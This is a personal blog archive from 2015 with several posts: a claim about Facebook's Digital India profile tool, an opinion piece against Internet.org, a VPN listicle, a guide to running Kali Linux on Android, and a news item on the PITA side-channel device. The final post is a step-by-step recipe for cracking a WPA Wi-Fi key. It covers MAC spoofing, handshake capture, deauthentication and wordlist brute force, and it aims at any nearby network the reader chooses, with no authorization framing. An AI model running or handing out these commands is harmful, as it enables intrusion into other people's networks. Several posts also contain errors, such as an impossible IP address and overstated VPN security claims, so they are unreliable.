Tuesday, September 29, 2015

There is noting messy in fb.com/supportdigitalindia

hello,
         Here is a great news over india that facebook using the fb.com/supportdigitalindia for internet.org and the news or the websites are just giving the prof a pic which have a <Div> with the class name "internetorg profilepic"



Which is not truth ...

Actually They are changing the source code by editing class name.

when i heard i also got shocked that what happening here ... so i visited the page and inspected the source code. here is nothing like that what humorous telling to us u can view the image of source code i have inspected.




See the blue line and compare both images .. you will come to know what is the truth 
i will also give you some link directions snapshot soon ... i am working on it . 

Thank YOU :

please share if agree :)

I Support Digital India, But I haven't Changed My Facebook Profile Picture. Here's Why...

facebook-internetorg-digital-india

DIGITAL INDIA – A Flagship Programme of the Government of India with a vision to transform India into a digitally empowered society as well as a knowledge economy.

Yes, I am a proud Indian, and I support Digital India too, but I am absolutely not supporting Facebook's Internet.org Project.

Yesterday, Facebook's CEO Mark Zuckerberg and Indian Prime Minister Narendra Modi met at Facebook’s Headquarter. The Historic meeting between PM Modi and Zuckerberg went great.

Hours after this event, Facebook launched a tool that allows you to change your Facebook profile picture to a Tricolor shade of Indian Flag, just like few months back 30 Millions Facebook users had changed their Profile picture with Rainbow color to support "Gay Marriages."

The Latest Tool with URL http://fb.com/supportdigitalindia is to support the "Digital India" campaign by the PM Modi Government.

Ever since Zuckerberg changed his Facebook profile picture to an Indian Tricolor shade to show his support for the Digital India campaign, we Indians started following the same suit.

Our Facebook timelines have started flooding with tricolor profile pictures. Repeatedly, Facebook says, "Show Your Support for Digital India."

FACEBOOK'S RETURN GIFT FOR SUPPORTING INDIA?


'Gay Marriage' was a social cause, but Digital India is completely a Political and Business Initiative to grow Indian Digital Infrastructure. (I agree, we need this, but...)

What Facebook will get in return for promoting India's Project?

Digital India plans to connect rural areas with high-speed internet networks, but at what cost?

We all know: India is one of the biggest markets for Facebook, not just in terms of size, but also in terms of Revenue. Therefore, Facebook's support for 'Digital India' could indirectly mean to market its Internet.org project.

HERE’s WHY I WILL NOT CHANGE MY PROFILE PICTURE

facebook-profile-digital-india
To show my support to Digital India, I am not going to change my Facebook Profile picture.

Here's Why:
You may think this tricolor filtered profile picture is a gesture to support Digital India. However, it is not.

There seems to be a hidden agenda behind Zuckerberg's support for Digital India, and that is Internet.org – Facebook's much-criticized anti-net neutrality project – which has now been renamed to "Free Basics."

Yes, in the name of Modi's Digital India, Zuckerberg is silently promoting his Internet.org Campaign, which will potentially kill the Internet freedom in the Country.

Facebook, in collaboration with six companies, including Samsung, Media Tek, Software Nokia, Opera, Ericsson, and Qualcomm, launched Internet.org that aims at providing Free Internet services to developing nations.

WHAT YOU SHOULD KNOW ABOUT FACEBOOK’S FREE INTERNET PROJECT

internetorg
This move by Facebook is not exactly what it looks like. It actually is a blow to our Internet freedom and Net Neutrality, the one we are fighting for long.

Here's Why:
  • The Facebook's free Internet service will be available to Reliance users only.
  • Internet.org gives 'free access' only to Facebook and its 50 partner websites, which limits Internet users to stick to those services only.
  • This Facebook Project is not giving Free Internet to people, instead giving free access to manipulated-Internet that Facebook wants users to see.
Isn't this violation of Net Neutrality? When Internet provider will decide what we are going to see on the Internet.

Threats:
  • Death of Start-ups. With this move, we closed doors for another FlipKart or SnapDeal.
  • Death of Small businesses. Local businesses will not grow, as the site who will pay more will be part of Facebook's free Internet project.
  • Your Internet Remote in Facebook’s Hand. With internet.org, you are indirectly giving Facebook more power to control what you can access on the Internet.

POOR PEOPLE, "1st PROVIDE FREE DEVICES, THEN FREE INTERNET."


Okay, let's ignore all these points and believe that Facebook really wants to provide Free Internet access to those poor people who cannot afford data packages provided by Internet Service Providers (ISPs).

But think about it, if a person is unable to afford data packages, how he/she will possibly be able to afford a device that is required to access even Facebook's Free Internet?

MEANWHILE… ANKIT FADIA APPOINTED AS BRAND AMBASSADOR FOR 'DIGITAL INDIA'

ankit-fadia-digital-india
Yes, you heard right!

Indian Self-proclaimed Hacker, Ankit Fadia, has reportedly been appointed as one of the brand ambassadors for Prime Minister Narendra Modi's Digital India Initiative.

He made this announcement on his official Facebook Page. However, we have no official confirmation or announcement from the Government as of yet.

I have nothing to say about Ankit Fadia in this article, but can read more about him from Forbes.

According to me, Digital India Needs Influential and Inspirational "Technologists" as Brand Ambassadors, not any hackers or marketing gurus.

THINK TWICE BEFORE CHANGING YOUR PROFILE PICTURE


So, think twice before changing your Facebook profile picture to tricolor shade, you might indirectly support Facebook's Internet.org project.

I smell a rat here when Facebook supporting 'Digital India.'

My article is not to hurt your patriotism, as I'm too a supporter of Digital India, but not like this. So, Choose Wisely.

reference:http://thehackernews.com/2015/09/digital-india-facebook.html 

Saturday, September 26, 2015

3 Methods to Hide IP Address

The internet is a fantastic tool, but with an option as powerful as it has become comes some great risk. Identity theft, spyware, spam, and an utter lack of privacy all come when you’re browsing from almost anywhere in the world, but you do have an option. You can hide your IP address. With a few simple steps, you can safely browse almost any site from anywhere in the world, even if you’re using a more public WiFi connection.
3 Methods to Hide IP Address
What is meant by IP address?
Not even sure what an IP address is? IP stands for Internet Protocol, and put simply, it’s a way for one computer (or tablet or phone) to communicate with another one on the internet. It literally connects you to all of the other digital devices online right now. Your IP address is four numbers, and they contain one to three digits each. So it could be something like 76.103.2.567 or 98.102.56.32. No matter what yours actually is, though, it’s those four numbers that allows you to send and receive data online.
IP addresses are either static or dynamic, which means they either change or don’t change. Static IP address remain the same all of the time, and they always tell where you’re located. Dynamic addresses, though, are borrowed from a pool of options every time you log on.

What Your IP Reveals
If someone can gain access to your IP address, they can learn all kinds of things about you. For example, they can take a closer look at which provider you’re using to connect to the internet. They might be able to locate the city you’re in. If they’re really good at getting information online, they can track you down to your name and address, though that’s both rare and illegal.

Does It Really Matter?
The simple reality is that hiding your IP address matters quite a bit. When you hide your IP address, you’re guaranteeing that all of the data you send and receive is completely encrypted. Even if someone wanted to take a look, steal your information, or infect your computer, they couldn’t. It’s the perfect way to make certain no one is snooping around your connection if you’re out and about, but you still want the ability to shop, bank online, or connect to a network where security is a concern.
If you’re a downloader, you’ve probably already heard at least a bit about hiding your IP address. Even if you’re downloading legally, you can easily end up on some company’s bad side because you have a torrenting app installed. Hiding your IP address gives you the security you need when you’re downloading anything.

The Bottom Line
The internet should be a completely free and open space, and you have the right to make sure all of your communications are secure and encrypted within that space. An unsecured connection means that someone is reading what you say and what you do at all times. Hiding your IP address puts an end to that immediately.

 

Methods to hide IP address

 

3 Methods to Hide IP Address

Ready to hide your IP address? You probably should be. Fortunately, it’s easier than you think. There are several security tools that offer you this service. Take a look at these three.

IPinator VPN: This service is fairly new to the security world, but the reviews are amazing. They offer a minimalist layout, and their claim is that they hold more than 2000 IPs that are continually located and cleaned, so you always get a reliable connection, no matter where you are.

Hide My Ass VPN: Easily one of the biggest services on the market today, this UK-based option offers three different packages as well as access to 860 servers across 190 countries, so you have a huge number of available IP addresses when you sign up with them.

Private Internet Access: This service has been at the top of best lists by sites like PCMag for years. It makes it simple for users to surf both online and privately. It offers both basic functionality as well as advanced options.

Stop everyone from looking over your shoulder when you hit the web next. Choose a service that will keep you as secure as possible.

Kali Linux on Android using Linux Deploy

Kali Linux on any Android Phone or Tablet

linux-deploy-kali-list-00
Getting Kali Linux to run on ARM hardware has been a major goal for us since day one. So far, we’ve built native images for the Samsung Chromebook, Odroid U2, Raspberry Pi, RK3306, Galaxy Note 10.1, CuBox, Efika MX, and BeagleBone Black to name a few. This however does not mean you cannot install Kali Linux in a chroot on almost any modern device that runs Android. In fact, the developers of Linux Deploy have made it extremely easy to get any number of Linux distributions installed in a chroot environment using a simple GUI builder.
Prerequisites
  • A device running Android 2.1 and above, rooted.
  • At least 5 GB free space on internal or external storage.
  • A fast, wireless internet connection.
  • Patience to wait for a distribution to bootstrap from the network.
Configuring Linux Deploy for Kali
There’s actually very little to be done to get Kali installed. By choosing Kali Linux in the “Distribution” tab, you’ve pretty much covered the important stuff. Optionally, you can choose your architecture, verify that the Kali mirror is correct, set your installation type and location on your Android device, etc. Generally speaking, the defaults provided by Linux Deploy are good to begin with.
Building the Kali Image
install-kali-linux-deploy
Once you are happy with all the settings, hitting the “install” button will start a Kali Linux bootstrap directly from our repositories. Depending on your Internet connection speed, this process could take a while. You’ll be downloading a base install of Kali Linux (with no tools) at minimum.
Starting up your chrooted Kali
Once the installation is complete, you can have Linux Deploy automatically mount and load up your Kali Linux chroot image. This also includes the starting of services such as SSH and VNC for easier remote access. All of this is automagically done by hitting the “start” button. You should see Linux Deploy setting up your image with output similar to the following:
linux-deploy-mount
At this stage, Linux Deploy has started a VNC and SSH server inside your chrooted Kali image. You can connect to the Kali session remotely using the IP address assigned to your Android device (in my case, 10.0.0.10).
Logging in to your chrooted Kali
Now you can use either a SSH or VNC client to access your Kali instance. The VNC password is “changeme” and the SSH credentials are “android” for the username (configured via Linux Deploy) and “changeme” as the password.

Image Size Considerations
If left unchanged, Linux Deploy will automatically set an image size of around 4 GB, for a “naked” installation of Kali. If you would like to install additional Kali tools down the road, you might want to consider using a larger image size, which is configurable via the settings in Linux Deploy.
Local VNC Connections
We had to try a couple of VNC clients to get one to work properly. Although controlling Kali through a local VNC client isn’t the most convenient of tasks, it certainly is possible. However, we suspect that most people will be SSH’ing into this instance. The picture below was overlayed with a Kali Linux desktop screenshot taken from a Galaxy S4.

Thursday, September 17, 2015

A Homemade Device That Can Steal Keys and Hack Data From Your PC: PITA


When someone talks about stealing some data from a PC, what is the suspected source according to you? You may end up guessing Ethernet, WiFi, or Bluetooth.But once in a while, the truth could be something totally different.

The researchers at Tel Aviv University and the Technion of Iran has made a device that could be easily made at home and it captured the stray radio waves emitted by your computer’s processor.

This round device has been dubbed PITA by its creators and it works within the two feet distance. This costs less than $300 using the easily available components and the PITA is small enough to fit inside a piece of pita bread. Actually, PITA is an abbreviation of Portable Instrument for Trace Acquisition.
The information fetched from the open air could be stored locally on an SD card that is housed on the device, or it could be transmitted to the spy with the help of WiFi. So, you can capture the electromagnetic waves and use them to decrypt the EIGamal and RSA data from up to 19 inches away.



The PITA is built using simple components like a WiFi antenna, SDR receiver, capacitors to tune the antenna, a loop antenna and is run using 4-AA batteries.
During the research, the researchers focused their attention on GnuPG (or GPG) – a software implementation by the GNU Project and is widely used. It secures sensitive stuff like BitCoin wallets, emails and conversations. Well, the people at GNU have already issued an update against this particular attack.
However, this technique could also be used against RSA and other forms of encryption and the PITA team is working to expand the range of the device.
Did you like this story about the processor hacking gadget PITA? Do tell us in comments below.

Sunday, September 13, 2015

How to hack WI-FI using kali

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.
1.       Open a terminal window and bring up a list of wireless network interfaces.
airmon-ng
2.       Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.
3.       Next, we need to stop the wlan0 interface and take it down.
airmon-ng stop wlan0 ifconfig wlan0 down
4.       Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55.
macchanger -–mac 00:11:22:33:44:55 wlan0
5.       Now  we need to restart airmon-ng. airmon-ng start wlan0
6.       Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0
7.       A listing of available networks will begin to appear. Once you fi nd the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will fi nd this information in the Channel column. In this case, the channel is 10.
8.       Now we run airodump and copy the information for the selected BSSID to a fi le.
We will utilize the following options:
q  –c allows us to select our channel. In this case, we use 10.
q  –w allows us to select the name of our file. In this case, we have chosen wirelessattack.
q  –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.
airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9.       A new terminal window will open displaying the output from the previous command. Leave this window open.
10.   Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments.
Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0
11.   Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap fi le that we named earlier. In this case, the fi le's name is wirelessattack.cap.
Aircrack-ng –w ./wordlist.lst wirelessattack.cap
That's it!







How it works...



In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. 
AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords  against the gathered data until a successful handshake is established. 
We began the recipe by starting AirCrack and selecting our desired interface. 
Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. 
We concluded by gathering some traffi c and then brute forced the generated CAP file in order to get the wireless password.